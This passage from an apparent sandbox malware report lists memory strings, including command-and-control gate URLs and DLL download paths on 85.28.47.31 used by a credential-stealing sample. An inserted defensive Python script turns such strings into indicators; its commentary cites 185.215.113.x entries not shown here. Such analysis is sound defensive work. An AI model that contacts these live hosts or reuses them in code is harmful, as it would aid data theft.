Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.00000000024C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpj
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpjQ
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpo
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.00000000005AD000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phposition:
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpwQ
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpx
Source: 8ec8c5c339.exe, 0000000A.00000002.2721852651.0000000002621000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpywB
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2741806930.00000000024C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/freebl3.dll
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/freebl3.dll9
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.00000000024C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/freebl3.dlly
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/mozglue.dll
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/msvcp140.dll
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/nss3.dll
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/nss3.dll=
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/softokn3.dll
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/softokn3.dllF
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.000000000046A000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/sqlite3.dll
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.00000000024FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/vcruntime140.dll
Source: 8ec8c5c339.exe, 0000000A.00000002.2721852651.0000000002621000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/Iw
Source: 8ec8c5c339.exe, 0000000A.00000002.2721852651.0000000002621000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/Qwj
Source: 8ec8c5c339.exe, 0000001E.00000002.2782069458.00000000026DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/al
Source: 8ec8c5c339.exe, 0000000A.00000002.2721852651.0000000002621000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/cwx
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.00000000024FA000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 0000001E.00000002.2782069458.00000000026DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/l
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.00000000024FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/r
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.00000000005AD000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: http://85.28.47.315499d72b3a3e55be.phposition:
Source: 8ec8c5c339.exe, 0000001E.00000002.2781993331.00000000026C0000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31EC
Source: 8ec8c5c339.exe, 00000008.00000002.2740205336.000000000249E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31FZSAi
Source: 8ec8c5c339.exe, 0000000A.00000002.2721852651.00000000025EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31Wi
Source: 8ec8c5c339.exe, 0000001E.00000002.2782069458.00000000026DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31p
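The URL strings recorded above for 185.215.113.16, 185.215.113.19 and 85.28.47.31 carry trailing bytes from adjacent memory (index.php17001, 5499d72b3a3e55be.phposition:, 85.28.47.31EC) that have to be stripped before the values are usable as indicators, and some fragments (/3w, /Iw, /l) cannot be recovered at all. The script below is an added example, not part of this report or of the sample's code: it canonicalizes such strings into host and URL indicators, keeps the unrecoverable ones in a separate list instead of silently dropping or inventing paths, and runs on a constructed set of lines modelled on the entries above. The list of file extensions it truncates on is an assumption chosen for these entries.

```python
"""Normalize memory-extracted URL strings from a sandbox report into IOCs.

Added example, not part of the report. SAMPLE_LINES is constructed in the
shape of the report's "String found in binary or memory" entries.
"""
import ipaddress
import re

URL_RE = re.compile(r"https?://\S+")
IPV4_PREFIX_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")
# Assumption: the first of these extensions ends the real path; whatever
# follows it is memory garbage, not part of the URL.
KNOWN_EXT = (".php", ".exe", ".dll")

# Constructed sample input modelled on the report's entries.
SAMPLE_LINES = [
    "Source: explorti.exe String found in binary or memory: http://185.215.113.19/Vi9leo/index.php17001",
    "Source: explorti.exe String found in binary or memory: http://185.215.113.16/stealc/random.execodediD",
    "Source: 8ec8c5c339.exe String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phposition:",
    "Source: 8ec8c5c339.exe String found in binary or memory: http://85.28.47.315499d72b3a3e55be.phposition:",
    "Source: 8ec8c5c339.exe String found in binary or memory: http://85.28.47.31EC",
    "Source: 8ec8c5c339.exe String found in binary or memory: http://85.28.47.31/8405906461a5200c/freebl3.dlly",
    "Source: 8ec8c5c339.exe String found in binary or memory: http://85.28.47.31/3w",
    "Source: 8ec8c5c339.exe String found in binary or memory: http://85.28.47.31/",
]


def leading_ipv4(text):
    """Longest prefix of text that is a valid dotted-quad IPv4 address, else None."""
    m = IPV4_PREFIX_RE.match(text)
    if not m:
        return None
    cand = m.group(0)
    # '85.28.47.315499...' matches the regex, but 315 is not an octet:
    # shorten the candidate until it parses.
    while cand:
        try:
            return str(ipaddress.IPv4Address(cand))
        except ValueError:
            cand = cand[:-1]
    return None


def canonicalize(url):
    """Split a memory-extracted URL into (host, path, exact).

    host  - IP or hostname with glued-on bytes removed
    path  - recovered path, or None when it cannot be recovered
    exact - True only when host+path is the complete URL as it was in memory;
            when False, use only the host as an indicator
    """
    _, _, rest = url.partition("://")
    host_part, slash, path = rest.partition("/")
    host = leading_ipv4(host_part) or host_part
    if not slash:
        # 'http://85.28.47.31' is complete; 'http://85.28.47.31EC' is not,
        # because the garbage may have overwritten a path.
        return host, None, host == host_part
    path = "/" + path
    if path == "/":
        return host, "/", True
    cuts = [path.find(ext) + len(ext) for ext in KNOWN_EXT if ext in path]
    if cuts:
        return host, path[:min(cuts)], True
    # '/3w', '/l', '/Local': a real short path or pure garbage; cannot tell.
    return host, None, False


def build_iocs(lines):
    """Aggregate report lines into sorted host, URL and ambiguous-string lists."""
    hosts, urls, ambiguous = set(), set(), set()
    for line in lines:
        for raw in URL_RE.findall(line):
            scheme = raw.split("://", 1)[0]
            host, path, exact = canonicalize(raw)
            hosts.add(host)
            if exact and path is not None:
                urls.add(f"{scheme}://{host}{path}")
            elif not exact:
                ambiguous.add(raw)
    return {
        "hosts": sorted(hosts),
        "urls": sorted(urls),
        "ambiguous": sorted(ambiguous),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(build_iocs(SAMPLE_LINES), indent=2))
```

Run against the full list above, the exact URL set reduces to the /5499d72b3a3e55be.php and /Vi9leo/index.php gates, the four random.exe download paths on 185.215.113.16, and the seven DLLs under /8405906461a5200c/ (nss3, softokn3, freebl3 and mozglue are Mozilla NSS components, sqlite3 the SQLite engine, plus the MSVC runtime they need); a host that serves that DLL set next to a .php gate is itself a strong detection signal. The ambiguous list is what remains for manual review, which is preferable to either discarding those strings or emitting indicators such as /3w that would never match real traffic.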
Source: firefox.exe, 00000018.00000002.2630286434.00000238F3482000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%shandlerSvc
Source: firefox.exe, 00000018.00000002.2636379005.00000238F52B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
Source: firefox.exe, 00000023.00000002.3337329658.0000028631F64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3358002708.0000028632E49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 00000023.00000002.3321697398.0000028631021000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://dev.w3.org/html5/spec/rendering.html#rendering
Source: firefox.exe, 00000018.00000002.2630851621.00000238F3709000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2630851621.00000238F372C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2598025146.00000238F3712000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.00000286310AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListener
Source: firefox.exe, 00000018.00000002.2630851621.00000238F3709000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2630851621.00000238F372C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2598025146.00000238F3712000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.00000286310AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
Source: firefox.exe, 00000018.00000002.2628599943.00000238F2E24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2996654486.000002862D324000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 00000018.00000002.2628599943.00000238F2E81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2996654486.000002862D381000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/dates-and-times
Source: firefox.exe, 00000018.00000002.2628599943.00000238F2E24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2996654486.000002862D324000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 00000018.00000002.2628599943.00000238F2E81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2996654486.000002862D381000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/regular-expressions
Source: firefox.exe, 00000018.00000002.2628599943.00000238F2E24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2996654486.000002862D324000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 00000018.00000002.2625566496.00000238E7603000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/strings
Source: firefox.exe, 00000023.00000002.2938979510.0000028621A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/stringsp
Source: firefox.exe, 00000018.00000002.2632654052.00000238F441F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2632654052.00000238F4437000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2632654052.00000238F4413000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2837667745.00000286321A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3333979888.0000028631C03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.0000028631031000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2834188693.000002863208E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2841500368.00000286321A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2833700774.000002863204C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3339527137.00000286321A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2833949224.000002863208E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3168184572.000002862DC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3308305890.000002862E965000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2833583247.000002863208E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E8E8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2833188237.000002863208E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E895000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3334627067.0000028631D33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.0000028631021000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: 1c593ec106.exe, 00000009.00000000.2376356930.0000000000C51000.00000080.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 00000009.00000002.2920638250.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000000.2528010907.0000000000C51000.00000080.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000000.2695008858.0000000000C51000.00000080.00000001.01000000.0000000A.sdmp String found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
Source: 1c593ec106.exe, 00000009.00000000.2376356930.0000000000C51000.00000080.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 00000009.00000002.2920638250.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000000.2528010907.0000000000C51000.00000080.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000000.2695008858.0000000000C51000.00000080.00000001.01000000.0000000A.sdmp String found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr
Source: 1c593ec106.exe, 00000009.00000000.2376356930.0000000000C51000.00000080.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 00000009.00000002.2920638250.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000000.2528010907.0000000000C51000.00000080.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000000.2695008858.0000000000C51000.00000080.00000001.01000000.0000000A.sdmp String found in binary or memory: http://pki-ocsp.symauth.com0
Source: firefox.exe, 00000018.00000002.2630286434.00000238F3482000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000018.00000002.2636379005.00000238F52B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
Source: firefox.exe, 00000023.00000002.3337329658.0000028631F64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0.
Source: firefox.exe, 00000023.00000002.3337329658.0000028631F64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: firefox.exe, 00000023.00000003.2833583247.000002863208E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2833188237.000002863208E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://src.chromium.org/viewvc/chrome/trunk/src/third_party/cld/languages/internal/languages.cc
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000018.00000002.2636379005.00000238F52B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
Source: firefox.exe, 00000023.00000002.3306154976.000002862E8E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.ethiopic.org/Collation/OrderedLists.html.
Source: firefox.exe, 00000023.00000003.2833583247.000002863208E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2833188237.000002863208E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.google.com
Source: firefox.exe, 00000018.00000002.2630286434.00000238F3482000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%sresource://gre/modul
Source: firefox.exe, 00000018.00000002.2636379005.00000238F52B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: 8ec8c5c339.exe, 8ec8c5c339.exe, 00000008.00000002.2779820705.000000006C23D000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: firefox.exe, 00000023.00000002.3308305890.000002862E9B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2843731239.0000028630C75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3316150456.0000028630BDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3326407807.00000286315A6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2843731239.0000028630CB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DAA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000023.00000003.2843731239.0000028630C75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul%
Source: firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.0000028631021000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul);
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3846000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource:///modules/sessionstore/Global
Source: firefox.exe, 00000023.00000002.3108413567.000002862DAA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xultoolbar-context-menu-bookmarks-show-oth
Source: firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/newlayout/xml/parsererror.xml);
Source: 8ec8c5c339.exe, 00000008.00000002.2758711410.000000001CA62000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2779246693.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: firefox.exe, 00000023.00000002.3337329658.0000028631F64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: firefox.exe, 00000023.00000002.3337329658.0000028631F64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 00000018.00000003.2609028189.00000238F712E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2608033351.00000238F6F00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2612170664.00000238F7144000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2639277438.00000238F715B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2608317826.00000238F7118000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3326407807.0000028631538000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3168184572.000002862DC03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecop
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecopnacl
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 00000023.00000002.3321697398.0000028631045000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2978941920.000002862D252000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.orgcreateContentPrincipalFromOriginchrome://browser/skin/menu.svgdevice-conne
Source: firefox.exe, 00000023.00000002.2978941920.000002862D252000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.orgl
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3815000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etpexecuteIDB/promise
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.com
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://api.accounts.firefox.com/v1
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
